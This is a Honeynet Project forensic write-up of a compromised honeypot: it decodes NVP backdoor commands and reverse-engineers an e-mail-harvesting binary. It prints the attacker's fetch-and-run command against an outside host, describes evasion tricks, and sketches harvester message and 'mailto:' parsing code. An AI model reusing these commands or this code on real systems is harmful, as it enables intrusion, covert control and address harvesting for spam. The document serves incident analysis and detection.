Honeynet Project Scan of the Month - Scan 22 (August 2002)
Submission by Eloy Paris <peloy at chapus dot net>
Thu Aug 22 19:00:17 EDT 2002
To Chapu and he/she that is coming
1. Summary
The Honeynet Project's Scan of the Month for August requires the analysis of network traffic from/to a compromised host on which a backdoor program was installed by the perpetrator. We will see how the attacker uses this backdoor to instruct the compromised honeypot to execute several commands. One particular command downloads an executable from another host that seems to be under control of the attacker, and then executes it. The provided Snort log (a file that contains captured network traffic) suggests that the executable launches a Denial of Service (DoS) attack against a specific site (web.icq.com.) However, after reverse-engineering the downloaded file I conclude that the attacker is pursuing a completely different objective.
2. Analysis
In this section I discuss the steps that I followed to analyze the Snort network trace that was provided.
The first thing I notice after looking at the provided network capture (running "tcpdump -r snort-0718@1401") is that there is Network Voice Protocol (NVP) traffic. NVP is an IP protocol, with a protocol number of 11.
This sounds really familiar: the Honeynet Project's Reverse Challenge, which took place in May of this year, required reverse-engineering a program that was left running on a compromised honeypot.
After reverse-engineering this program[1] it was determined that its purpose was to act as a backdoor that would give the person that compromised the honeypot the following capabilities:
Now, the novel thing about the backdoor was that all communications between the backdoor and its handler were done via IP protocol 11 (NVP), which doesn't seem to be currently in use. Also, the IP data (which is used to tell the backdoor what commands to execute, what DoS to launch, victim IP addresses, etc.) was encoded with a simple algorithm, so unless the appropriate decoder is used it is not possible to make any sense of the data by just looking at it.
Knowing that the network traces contained IP protocol 11 traffic I analyzed the problem from the point of view of communications between the backdoor reverse-engineered during the Reverse Challenge and its handler.
With this in mind I wrote a small C program, dump.c[2], that processes the Snort log and prints out the commands sent to the backdoor as well as its responses. I ran this program on the provided Snort log and used the program output in the first step of my analysis. The program output is too large to be included here, but I am including it in Appendix A.
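As a rough illustration of the first filtering step a decoder like this has to perform, the sketch below checks whether a raw IPv4 datagram carries IP protocol 11 and, if so, locates its payload. It is not taken from dump.c: the function name nvp_payload() and the constant NVP_PROTO are hypothetical, and the buffer is assumed to start at the IP header (link-layer framing already removed). Decoding the payload itself is not shown.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define NVP_PROTO 11  /* IP protocol number of NVP (hypothetical constant name) */

/*
 * Return a pointer to the payload of an IPv4 datagram whose protocol
 * field is 11, or NULL if the buffer is not such a datagram.
 * On success *payload_len holds the number of payload bytes.
 * Hypothetical helper for illustration; not part of dump.c.
 */
const uint8_t *nvp_payload(const uint8_t *ip, size_t len, size_t *payload_len)
{
    size_t hdr_len, total_len;

    assert(payload_len != NULL);
    if (ip == NULL || len < 20)
        return NULL;                        /* shorter than a minimal IP header */
    if ((ip[0] >> 4) != 4)
        return NULL;                        /* not IPv4 */
    hdr_len = (size_t)(ip[0] & 0x0f) * 4;   /* IHL is counted in 32-bit words */
    total_len = ((size_t)ip[2] << 8) | ip[3];
    if (hdr_len < 20 || total_len < hdr_len || total_len > len)
        return NULL;                        /* inconsistent lengths */
    if (ip[9] != NVP_PROTO)
        return NULL;                        /* protocol field is at offset 9 */
    *payload_len = total_len - hdr_len;
    return ip + hdr_len;
}
```

For a command packet with a 20-byte header and no IP options, the payload length returned would be the 402 bytes of IP data that tcpdump reports for packets sent to the backdoor.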
By looking at the output we can clearly see what the attacker is doing:
11:09:13.557615 94.0.146.98 > 172.16.183.2: ip-proto-11 402
Initialize communication parameters. The backdoor is configured to send all its responses to the IP address 203.173.144.50.
11:10:34.876658 192.146.201.172 > 172.16.183.2: ip-proto-11 402
Request that the backdoor execute the command "grep -i "zone" /etc/named.conf" and send back the results.
11:10:35.005093 172.16.183.2 > 203.173.144.50: ip-proto-11 512
The following result is sent back:
zone "." {
zone "0.0.127.in-addr.arpa" {
11:10:35.495194 172.16.183.2 > 203.173.144.50: ip-proto-11 463
Final part of the command requested in packet #8. It's just an empty string.
15:35:00.285126 168.148.27.14 > 172.16.183.2: ip-proto-11 402
15:35:56.667243 10.39.81.89 > 172.16.183.2: ip-proto-11 402
The handler requests (twice) that the backdoor execute the command "killall -9 ttserve". This suggests that the attacker had previously run a program called "ttserve" and wanted to make sure it was not running at this time.
15:57:37.983480 58.248.76.90 > 172.16.183.2: ip-proto-11 402
This is perhaps the most important command since I will be focusing on its effects for the remainder of this paper. The attacker requests that the backdoor execute the following command (without sending back the output):
killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;
The important commands here are "lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve" and "./ttserve". We'll analyze these later on.
16:02:40.043361 218.209.145.27 > 172.16.183.2: ip-proto-11 402
16:03:37.492985 122.255.17.55 > 172.16.183.2: ip-proto-11 402
16:04:33.707291 26.44.146.84 > 172.16.183.2: ip-proto-11 402
Request (three times) the execution of the command "killall -9 lynx ; rm -rf /tmp/ttserve;"
Now that I have identified the commands the attacker has sent to the backdoor I can use standard tools to study the rest of the network traffic that was captured. Using Ethereal or tcpdump I can see the following traffic patterns (see note below about the IP 11.11.11.11 shown in the following packets):
15:57:39.114395 172.16.183.2.1025 > 11.11.11.11.8882: S 240028091:240028091(0) win 32120(DF)
The 3-way handshake for the HTTP download from 216.242.103.2:8882 starts. The download starts two packets later (packet #76.)
The download ends:
15:57:52.376036 11.11.11.11.8882 > 172.16.183.2.1025: R 215579:215579(0) ack 546 win 31856(DF)
15:57:55.439307 172.16.183.2.1025 > 11.11.11.11.53413: udp 3
A UDP packet from the compromised honeypot to 216.242.103.2 port 53413.
Note: This is a "preview". There's no way of knowing at this point that the UDP packet goes to 216.242.103.2. Here we see that it goes to 11.11.11.11. I know it doesn't go to 11.11.11.11 but to 216.242.103.2 because I reverse-engineered "foo". See the next note below.
15:57:55.493471 11.11.11.11.53413 > 172.16.183.2.1025: udp 10
216.242.103.2 responds with another UDP packet.
216.242.103.2 seems to be under the control of the attacker too (compromised.) If this is the case, the reason why the attacker didn't use 216.242.103.2 instead of the honeypot for his/her evil doings eludes me.
The HTTP downloads from web.icq.com might lead me to think that what "foo" is doing is just a DoS on web.icq.com. We shall see if this is true...
Note: There is something weird here: I know that the HTTP download that starts in packet #73 is for a file from 216.242.103.2:8882. However, the Snort log shows 216.242.103.2 as 11.11.11.11. Some possible explanations for this include:
The IP header checksum is invalid (we can see this with tcpdump or Ethereal) and I know this is not possible because the honeypot is running Linux, and the Linux kernel always calculates the IP header checksum, even when sending packets via raw sockets (see the raw(7) manual page.) Furthermore, an IP packet with an invalid checksum would have been dropped (read RFC-791.)
To confirm this theory I picked one packet and calculated manually the IP header checksum but using the IP address I believe was originally there (which was obtained through the reverse-engineering process.) The result matched the checksum present in the Snort log. This means that the IP header originally did not have 11.11.11.11 as the address in the source or destination fields of the IP header.
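The manual check described above can be sketched in a few lines of C. This is only an illustration of the RFC 791 header checksum, not the procedure I actually followed; the function names are hypothetical and the header is assumed to be available as a plain byte array.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * RFC 791 header checksum: one's complement of the one's-complement sum
 * of the header taken as 16-bit big-endian words. Zero the checksum
 * field (bytes 10-11) first to compute the value to store; run over a
 * header with its checksum in place, the result is 0 when it is valid.
 */
uint16_t ip_header_checksum(const uint8_t *hdr, size_t hdr_len)
{
    uint32_t sum = 0;
    size_t i;

    assert(hdr != NULL && hdr_len % 2 == 0);
    for (i = 0; i < hdr_len; i += 2)
        sum += ((uint32_t)hdr[i] << 8) | hdr[i + 1];
    while (sum >> 16)                       /* fold carries back in */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/*
 * Return 1 if the stored checksum would be valid with candidate_addr
 * written at addr_offset (12 = source address, 16 = destination
 * address), 0 otherwise. The header passed in is not modified.
 */
int checksum_matches_with_addr(const uint8_t *hdr, size_t hdr_len,
                               size_t addr_offset,
                               const uint8_t candidate_addr[4])
{
    uint8_t copy[60];                       /* an IPv4 header is at most 60 bytes */

    if (hdr_len < 20 || hdr_len > sizeof copy || hdr_len % 2 != 0)
        return 0;
    if (addr_offset != 12 && addr_offset != 16)
        return 0;
    memcpy(copy, hdr, hdr_len);
    memcpy(copy + addr_offset, candidate_addr, 4);
    return ip_header_checksum(copy, hdr_len) == 0;
}
```

Under these assumptions, a header taken from the log with 11.11.11.11 in it would fail ip_header_checksum(), while checksum_matches_with_addr() called with the bytes of 216.242.103.2 at the right offset would succeed if that was the address originally present.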
So, I strongly believe the Snort log has been tampered with, but this is not important since I will reverse engineer "foo". What is important is to note that whenever we see 11.11.11.11 in the Snort log (as shown above) that's not the real IP address the packet is coming from/going to.
2.3 "lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve"
As I mentioned in the previous section, in packet #72 the attacker requests that the backdoor execute several commands. One of these commands just downloads using HTTP a file called 'foo' from a specific HTTP server (at IP address 216.242.103.2, TCP port 8882.) The command saves "foo" as "/tmp/ttserve" and then executes it.
Since I know that running "ttserve" generates HTTP traffic against web.icq.com, it is absolutely necessary to get a hold of this file so it can be analyzed.
As we shall see, if the Honeynet Project had given us a little bit more of network capture, I would not have needed to get a hold of "foo" and study it. However, seeing what happens after packet #5085 would make this Scan of the Month too easy :-)
There are several ways of reconstructing "foo" from the Snort log file. Some of these are:
1) Use Ethereal to reconstruct the HTTP conversation, save the conversation to disk (it will be saved as a text file) and then write a small script that processes the file and generates the binary (we can also do something similar with tcpdump or even Snort in tcpdump file reading mode.)
2) Write a custom program that processes the Snort log file directly and generates the binary. Any language that has an interface to libpcap (C and Perl, for example) will make things easier.
3) Take advantage of a tool that someone already wrote, like Jeremy Elson's tcpflow.
In this case I just used tcpflow, which is perhaps the easiest way because there is no need to write any code:
peloy@canaima:/tmp$ tcpflow -r snort-0718%401401.log
peloy@canaima:/tmp$ vi 011.011.011.011.08882-172.016.183.002.01025
peloy@canaima:/tmp$ mv 011.011.011.011.08882-172.016.183.002.01025 foo
tcpflow generates several files but I chose the one that starts with "011.011.011.011" because that's the one that contains the HTTP download (remember that the port used was 8882, which is embedded in the file name above.)
I edited the file (as shown above) to remove the header returned by the HTTP server. (By the way, recovering binary files from Snort logs has been covered extensively in previous Scans of the Month.)
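Removing the header by hand in an editor works, but the same step can be automated. The following is a minimal sketch, assuming the whole file written by tcpflow has been read into memory; http_body_offset() is a hypothetical helper name, and the only fact it relies on is that an HTTP header ends at the first blank line (CR LF CR LF).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Return the offset of the first body byte in an HTTP response, i.e. the
 * byte right after the first blank line (CR LF CR LF), or len if the
 * buffer contains no blank line.
 */
size_t http_body_offset(const unsigned char *buf, size_t len)
{
    size_t i;

    assert(buf != NULL);
    for (i = 0; i + 4 <= len; i++)
        if (memcmp(buf + i, "\r\n\r\n", 4) == 0)
            return i + 4;
    return len;
}
```

Writing the bytes from that offset to the end of the buffer into a new file would yield the binary. A quick sanity check is that a Linux executable normally begins with the four bytes 0x7f 'E' 'L' 'F'.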
Now that I have "foo", a.k.a. "ttserve", the fun can begin.
As I mentioned at the end of section 2.2, the HTTP traffic between the compromised honeypot and web.icq.com might lead us to think that the sole purpose in life of "foo" is to execute a DoS attack against web.icq.com. In fact, the Snort log shows how "foo" needs to retry the downloads several times, or that three-way handshakes fail, or that TCP connections are reset, all of which suggest that web.icq.com might be flooded with HTTP requests and that the "DoS attack" is succeeding. However, the only way of determining the purpose of "foo" for sure is by reverse-engineering it.
I reverse-engineered "foo" and came up with an equivalent C program, foo.c, which is easier to understand. With the source code for "foo" we can now understand exactly what "foo" does, and what the attacker was trying to do. "foo" has the following characteristics:
The most difficult part of reverse-engineering a statically-linked binary like "foo" is reconstructing the symbol table and figuring out the calls to functions in the C library. When I disassembled the-binary for the Reverse Challenge I used a very cumbersome process to reconstruct the symbol table. Fortunately, the winner of the Challenge, Dion Mendel, developed some fantastic tools that make reconstructing a symbol table child's play. So, for this reverse-engineering task I used his tools, which can be downloaded from http://www.honeynet.org/reverse/results/sol/sol-06/.
Once the symbol table is reconstructed all you need is a little bit of patience and some knowledge of assembly language, C, network programming, and how a C compiler generates assembly language for some C constructs, like variable allocation, "if" statements, "for", "do ... while()" and "while ()" loops. Plain old paper and pencil help too. Basically, one starts with the assembly language listing and reconstructs the equivalent C program.
For more information on reverse-engineering a binary I recommend you read some of the top 20 submissions for the Reverse Engineer Challenge. They are worth reading.
The features of "foo" will be explained in detail in Question 4.
3. Answers
Question 1. What is the attacker's IP address?
The attacker initializes the backdoor running on the hacked honeypot in packet #7. The initialization (command code 2 - see packet-format.txt) tells the backdoor to send its responses to one particular IP address as well as to 9 other randomly generated IP addresses (response mode 1), although there is a bug in the backdoor and only 8 random IPs are used (in addition to the real IP sent by the attacker.)
The initialization command used in packet #7 configures the backdoor to respond to the IP address 203.173.144.50. However, I don't know for sure if this is the IP address of the machine being used by the attacker since he/she could be sniffing traffic going to that machine or network. The attacker could be in the same IP network as 203.173.144.50, or sniffing in a segment that traffic going to 203.173.144.50 must cross.
I cannot infer anything from the source IPs in the packets that control the backdoor since these IPs are spoofed, i.e. they are random IPs.
203.173.144.50 resolves to p50-tnt7.syd.ihug.com.au. The web page at www.ihug.com.au tells us that IHUG is an Internet Service Provider in Australia. "whois 203.173.144.50" confirms that the IP address to which the backdoor will send its responses is in a block assigned to IHUG.
The FQDN of the machine also gives information about the physical location where the attacker might be located: Sydney, Australia.
The Snort log that was provided during the Reverse Challenge (so participants could test their network traffic decoders) shows that the attacker programmed the backdoor to respond to the IP 203.173.144.35 (p35-tnt7.syd.ihug.com.au). This IP is in the same network, which suggests that the attacker is connecting to the Internet via dial-up because he/she gets a different IP with each new connection. If this ISP keeps connection logs for its users, and given that we know the exact time the attacker was messing around with the compromised host, it would be easy to further track the attacker (account that was used during the attacks, phone number the attacker dialed in from, etc.)
Question 2. What is the attacker doing first? What do you think is his/her motivation for doing this?
There are three things the attacker does before starting what I consider the attacker's main activity:
Another additional motivation might be to find out if the honeypot was going to cache DNS requests during an attack (be it a DoS or just a sweep of web pages to harvest e-mail addresses) initiated from the compromised honeypot. If DNS requests are cached there is less network activity that can reveal that something is going on.
The presence of /etc/named.conf does not imply that named is running, though.
Question 3. Why there is some readable text in packets #17-#25 (and some others), but not in packets #15-#16 (and several others)? What differentiates these groups of packets from each other?
Actually, all the packets this question refers to have readable text (including packets #15 and #16.) I assume this is just a minor mistake. The readable text is towards the end of the packets and looks like (but is a bit different in each packet):
0x01b0 207b 0a7a 6f6e 6520 2230 2e30 2e31 3237 .{.zone."0.0.127
0x01c0 2e69 6e2d 6164 6472 2e61 7270 6122 207b .in-addr.arpa".{
0x01d0 0a00 636f 6e66 2220 313e 202f 746d 702f ..conf".1>./tmp/
0x01e0 2e68 6a32 3337 3334 3920 323e 2631 0098 .hj237349.2>&1
I believe the packets the Honeynet Project is referring to as containing readable text are part of two batches: the first batch contains packets #9 to #17, and the second contains packets #18, #20, #21, #22, #24, #25, #26, #27, and #28. Note that each batch has exactly 9 packets.
All the packets in these two batches are responses sent by the backdoor running on the compromised honeypot to the IP address specified in the initialization command (see Question 1) plus 8 random IPs, and contain the output of the command that the attacker instructed the backdoor to execute with packet #8.
The first batch contains the actual output from the command:
zone "." {
zone "0.0.127.in-addr.arpa" {
The second batch just contains an empty string, and is there to signal the end of the command output. Think of it like a C string: a C string is a sequence of characters that ends with a null byte. Well, the only way the attacker has of knowing there is no more output coming from the backdoor is by receiving a last packet with an empty string.
The reason why some packets have readable text is a mistake made by the author of the-binary: if you look at my decompilation of the-binary you'll see that the backdoor encodes 400 bytes for sending (see line 245 of the-binary.c), but then sends (in lines 246-247) 400 bytes plus an additional random number of bytes (between 0 and 200, since the code uses rand() % 201):
 70     char *bufptr, buffer[400];
[...]
232     bufptr = buffer;
233     do {
234         bytes_read = fread(ippacket, 1, 398, output_file);
235         ippacket[bytes_read] = '\0';
236         for (i = 0; i <= 397; i++)
237             decoded[i + 2] = ippacket[i];
[...]
245         encode(400, decodedptr, bufptr);
246         send_response(ips_ptr, bufptr,
247                       (rand() % 201) + 400);
248         usleep(400000);
249     } while (bytes_read != 0);
Between 0 and 200 of the bytes the backdoor sends are not encoded, and these bytes are the readable text we see in the network packets this question refers to: bufptr points to a buffer of 400 bytes located on the stack (declared in line 70), and since we are telling send_response() to send between 400 and 600 bytes, most of the time send_response() will read past the end of the buffer pointed to by bufptr, into a part of the stack that happens to hold text that is not encoded. The solution to this problem would be to make the buffer bigger (600 bytes) and encode the exact number of bytes being sent.
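From the analyst's side, this means that everything after the first 400 bytes of IP data in a response can be read without any decoder. The sketch below shows one way to pull that tail out of a payload; unencoded_tail() is a hypothetical helper (it is not part of dump.c), and non-printable bytes are replaced with dots, as tcpdump does in its ASCII column.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

/*
 * Copy the bytes that follow the encoded region of a backdoor response
 * into out as a NUL-terminated string, replacing non-printable bytes
 * with '.'. encoded_len is the number of leading bytes that were
 * actually encoded (400 for the-binary). Returns the number of
 * characters written, not counting the terminating NUL.
 */
size_t unencoded_tail(const unsigned char *payload, size_t payload_len,
                      size_t encoded_len, char *out, size_t out_size)
{
    size_t i, n = 0;

    assert(payload != NULL && out != NULL && out_size > 0);
    for (i = encoded_len; i < payload_len && n + 1 < out_size; i++)
        out[n++] = isprint(payload[i]) ? (char)payload[i] : '.';
    out[n] = '\0';
    return n;
}
```

For the 512-byte response that tcpdump shows going to 203.173.144.50, this would return the last 112 bytes, which is where the readable text sits.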
As you can see, knowledge about the internals of the-binary really helps to understand what we are seeing on the wire.
By the way, I mentioned in question #1 above that the attacker configured the backdoor to send responses to 1 specific IP and to 9 random IPs, but that because of a bug in the backdoor only 8 random IPs are used. This is what we are seeing here: packets #17 to #25 are the output of the command 'grep -i "zone" /etc/named.conf', sent to 9 IPs instead of 10 because of the bug.
Question 4. What is the purpose of 'foo'? Can you provide more insights about the internal workings of 'foo'? Do you think that 'foo' was coded by a good programmer or by an amateur?
Just by looking quickly at the decompiled "foo" (foo.c) we can infer that the purpose of "foo" is to harvest electronic mail addresses from web.icq.com via HTTP, and once a certain number has been collected, send them via UDP to a particular host on the Net.
I must confess that I was fooled by the Snort log when I first tried to guess the purpose of "foo". The reason is that the only thing I saw in the network trace were HTTP connections (lots of them) from the compromised honeypot to web.icq.com, and this led me to believe that "foo" was performing a DoS attack against this host. So, it wasn't until I finished reverse-engineering "foo" that I realized what "foo" was really doing.
"foo" works in the following way:
The communication between "foo" and its master follows a very simple protocol:
GET /wwp?Uin=x
GET /wwp?Uin=x+1
GET /wwp?Uin=x+2
[...]
where x is the number that was received in the "GU" command, and the delay between GETs is hard-coded at 25 seconds.
"foo" will harvest e-mail addresses from these web pages. It will do so by parsing the downloaded web page for the string "mailto:" and saving the text that follows, i.e. an e-mail address.
"SEx\nuser1@domain1\nuser2@domain2\n ...user100@domain100\n"
(the x after "SE" is the Uin that was received in the "GU" command.)
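To make the two message formats above concrete, here is a small sketch that builds the request line for a given Uin and the "SE" report that carries the harvested addresses. It is written from the formats shown in this section, not copied from foo.c; the function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Format "GET /wwp?Uin=<uin>" into out. Returns length, or -1 if it does not fit. */
int format_wwp_request(char *out, size_t out_size, unsigned long uin)
{
    int n;

    assert(out != NULL && out_size > 0);
    n = snprintf(out, out_size, "GET /wwp?Uin=%lu", uin);
    return (n < 0 || (size_t)n >= out_size) ? -1 : n;
}

/*
 * Build "SE<uin>\n<addr1>\n<addr2>\n..." into out, where uin is the
 * number received in the "GU" exchange. Returns the message length,
 * or -1 if the message does not fit in out.
 */
int build_se_message(char *out, size_t out_size, unsigned long uin,
                     const char *const addrs[], size_t count)
{
    size_t used, i;
    int n;

    assert(out != NULL && out_size > 0);
    n = snprintf(out, out_size, "SE%lu\n", uin);
    if (n < 0 || (size_t)n >= out_size)
        return -1;
    used = (size_t)n;
    for (i = 0; i < count; i++) {
        n = snprintf(out + used, out_size - used, "%s\n", addrs[i]);
        if (n < 0 || (size_t)n >= out_size - used)
            return -1;
        used += (size_t)n;
    }
    return (int)used;
}
```

A caller would invoke format_wwp_request() for x, x+1, x+2 and so on, and call build_se_message() once enough addresses have been collected.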
Appendix B contains a sample communication session where the protocol can be seen at work.
As we can see, if the Honeynet Project had included a few more packets from their Snort log we would have seen "foo" sending some e-mail addresses to 216.242.103.2 UDP port 53413, and reverse-engineering "foo" would not have been necessary. I can only assume this was done on purpose, to make the Scan of the Month more interesting :-)
Regarding the skills of the author of "foo", I would say that the author is neither a beginner nor an advanced programmer (perhaps closer to "advanced" than to "beginner.") The program is well structured (good use of subroutines), and the communication protocol between "foo" and its handler is very simple but works well and is well implemented. Error handling seems to be done well, and application-level reliability (needed because UDP itself is unreliable) is also implemented (and implemented well.)
I saw many stupid things (and even bugs) when I decompiled the-binary from the Reverse Challenge, and the facts (build environment, programming style) lead me to conclude that it was the same programmer who wrote both the-binary and foo. However, "foo" looks a bit better and doesn't have the mistakes made in the-binary. But this might be just because the program is much simpler.
The code in foo.c's harvest_email_addresses() function, especially the code that parses an HTML page looking for "mailto:" URIs is a bit hairy, with excessive use of if's and else's, though. This could be simplified.
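As an idea of what a simpler parser could look like, here is a minimal sketch built on strstr() and strcspn(). It is my own illustration and not the code found in "foo"; the function name next_mailto() and the set of characters treated as terminators are assumptions.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Find the next "mailto:" in html (case-sensitive) and copy the address
 * that follows into out. Copying stops at a quote, angle bracket, '?',
 * or whitespace, or when out is full (the address is then truncated).
 * Returns a pointer just past the copied text so the caller can keep
 * scanning, or NULL when no further "mailto:" is found.
 */
const char *next_mailto(const char *html, char *out, size_t out_size)
{
    static const char marker[] = "mailto:";
    const char *p;
    size_t n;

    assert(html != NULL && out != NULL && out_size > 0);
    p = strstr(html, marker);
    if (p == NULL)
        return NULL;
    p += sizeof marker - 1;                 /* skip past "mailto:" */
    n = strcspn(p, "\"'<>? \t\r\n");        /* length of the address */
    if (n >= out_size)
        n = out_size - 1;                   /* truncate rather than overflow */
    memcpy(out, p, n);
    out[n] = '\0';
    return p + n;
}
```

Calling it in a loop, each time passing the pointer returned by the previous call, walks through every "mailto:" URI in a page without any nested if/else chains.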
I'd say that "foo" was written by someone that is getting good at programming.
Question 5. What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done by the attacker?
"./ttserve" just executes the program "foo", which was downloaded from http://216.242.103.2:8882/foo and saved as /tmp/ttserve (see section 2.3.) Running "ttserve" will start the e-mail harvesting process I explained in Question 4.
As we saw in the previous question, one of the first things that ttserve (a.k.a. "foo") does when it runs is to fork. The parent process exits but the child stays running doing its evil business. This means that control returns to the shell and the command "rm -rf /tmp/ttserve" is executed while "ttserve" is still running. /tmp/ttserve is removed by the attacker to get rid of the evidence. Now that the program is running there is no need to have the executable lying around anymore.
Remember also that "ttserve" concealed its program name as "(nfsiod)" so it could not be noticed by a valid user of the honeypot through the "ps" command. This is an extra measure to prevent detection of the activities performed by the attacker.
Finally, since './ttserve ; rm -rf /tmp/ttserve' is not executed through an interactive shell, there is no .history or .bash_history file that can be used to determine what commands the attacker executed.
Question 6. How do you think the attacker will use the results of his activity involving 'foo'?
As we saw, foo is a tool that harvests electronic mail addresses from web.icq.com. In these days when e-mail spamming has become one of the worst plagues of the 21st century (an e-plague), it is fairly obvious what the attacker can do with thousands of e-mail addresses collected automatically by a little program in very little time. Ways in which the attacker could use the results of his activity involving "foo" include:
I find #1 the most likely use of the e-mail addresses.
Bonus Question. If you administer a network, would you have caught such NVP backdoor communication? If yes, how? If you do not administer a network, what do you think is the best way to prevent such communication from happening and/or detect it?
I just administer a home network, and my border router is configured to block most traffic except some traffic that I explicitly allow for services I use. For example, I allow HTTP traffic to go through.
The border router is also configured to log all blocked traffic to an internal syslog server, so I would probably have noticed the NVP traffic by looking at the syslog:
Aug 12 19:33:57 gw 7455: Aug 12 23:33:57: %SEC-6-IPACCESSLOGNP: list 111 denied 11 ww.xxx.yy.zzz -> aa.bb.ccc.ddd, 1 packet
(the 11 after "denied" means "IP protocol 11")
The above syslog entry was generated when the border router blocked an incoming IP packet that had the IP protocol field set to 11 (NVP.)
Obviously, I would only have noticed the NVP packet, but I would not have obtained the real packet unless I was also capturing network traffic.
An Intrusion Detection System (IDS) like Snort would be the best way to detect the NVP backdoor because we could add signatures that would trigger an alert on the presence of IP protocol 11 traffic, and we could also have the IDS save the suspicious traffic to a disk file for later analysis. The Reverse Challenge (see question 4) asked a similar question to this one.
What would have been hard to notice is the sweep of web pages from web.icq.com that "foo" performs to harvest e-mail addresses. It is hard because it is legitimate traffic that is not logged anywhere, that is small, and that has a very slow rate (happens every 25 seconds.)
Summarizing:
4. Files
This section contains links to all the files referenced in this paper as well as a short summary of the purpose of the file.
5. Thanks
Appendix A - NVP Backdoor Commands
In this appendix I include the output of dump.c after passing it the Snort log provided for this Scan of the Month. The log is a network trace that has 5085 packets. Here I am only including the packets that are related to communications between the backdoor running on the compromised honeypot and the handler.
Please note that in the Snort log there is more NVP (IP protocol 11) traffic than what I am showing here (specifically, there are 16 packets not shown below.) The reason why I didn't include these 16 packets is because they are not relevant: remember that in packet 7 the NVP backdoor was initialized to send responses to 1 particular IP address plus 9 random addresses (of which only 8 are used due to a bug.) I am not including here the responses sent to random IPs. These responses account for the missing 16 packets.
peloy@canaima:/tmp$ dump -f snort-0718%401401.log
[...]
--------------------------------------------------
Packet 7, 11:09:13.557615
Length of IP data: 402 bytes
94.0.146.98 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 2 (Initialize communication parameters)
Response mode: 1 (To 1 specific IP address and 9 random IP addresses)
Respond to: 203.173.144.50
--------------------------------------------------
Packet 8, 11:10:34.876658
Length of IP data: 402 bytes
192.146.201.172 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 3 (Execute command, send back results)
Command to execute: grep -i "zone" /etc/named.conf
--------------------------------------------------
Packet 12, 11:10:35.005093
Length of IP data: 512 bytes
172.16.183.2 -> 203.173.144.50
Length of IP data: 512
IP protocol is NVP
Direction: From backdoor
Command output: 'zone "." {
zone "0.0.127.in-addr.arpa" {
'
--------------------------------------------------
Packet 22, 11:10:35.495194
Length of IP data: 463 bytes
172.16.183.2 -> 203.173.144.50
Length of IP data: 463
IP protocol is NVP
Direction: From backdoor
Command output: ''
--------------------------------------------------
Packet 62, 15:35:00.285126
Length of IP data: 402 bytes
168.148.27.14 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 ttserve
--------------------------------------------------
Packet 63, 15:35:56.667243
Length of IP data: 402 bytes
10.39.81.89 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 ttserve
--------------------------------------------------
Packet 72, 15:57:37.983480
Length of IP data: 402 bytes
58.248.76.90 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;
--------------------------------------------------
Packet 1236, 16:02:40.043361
Length of IP data: 402 bytes
218.209.145.27 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve;
--------------------------------------------------
Packet 1237, 16:03:37.492985
Length of IP data: 402 bytes
122.255.17.55 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve;
--------------------------------------------------
Packet 1282, 16:04:33.707291
Length of IP data: 402 bytes
26.44.146.84 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve;
--------------------------------------------------
Now that I have studied foo.c there's little doubt about the evil purpose of "foo". However, it always pays to do a little bit of testing, so I made a couple of minor changes to foo.c and recreated a test environment.
First, I wrote a small Perl script that simulates the /wwp script found at web.icq.com. The script is passed a parameter called Uin via an HTTP GET request. When the script is run it just generates a short HTML document that simulates a user's home page, and includes a "mailto:" URI.
Next I edited foo.c and changed all references to "web.icq.com/wwp" to "localhost/cgi-bin/wwp" so when "foo" starts sweeping web pages it does so in my local Apache server, and not the remote web.icq.com. I also replaced all references to 216.242.103.2 with localhost, so when "foo" tries to contact the handler to get instructions it contacts my local machine.
Finally, I ran "foo" and netcat on the local machine. I started netcat with parameters to listen on local UDP port 53413, which is the port "foo" is programmed to contact. I was then able to control foo by sending it commands manually.
The following is a sample testing session:
peloy@canaima:/tmp$ vi foo.c                  # s/web.icq.com/localhost/, etc.
peloy@canaima:/tmp$ gcc -Wall -o foo foo.c    # compile my foo.c
peloy@canaima:/tmp$ ps aux | grep nfs         # see if foo is running
peloy@canaima:/tmp$ ./foo                     # run foo
peloy@canaima:/tmp$ ps aux | grep nfs         # see if it is running now
peloy 7362 0.0 0.0 1316 500 ? S 19:45 0:00 (nfsiod)
peloy@canaima:/tmp$ nc -l -u -p 53413 -vv     # netcat: listen on UDP port 53413
listening on [any] 53413 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 33508
GU                   <- foo sends the "Get Uin" command
GU                   <- I didn't respond so foo resends
DU1073               -> I respond
SE1073               <- A few seconds later foo sends the e-mails it's
1073@whatever.com    *  harvested
1074@whatever.com    *
1075@whatever.com    *
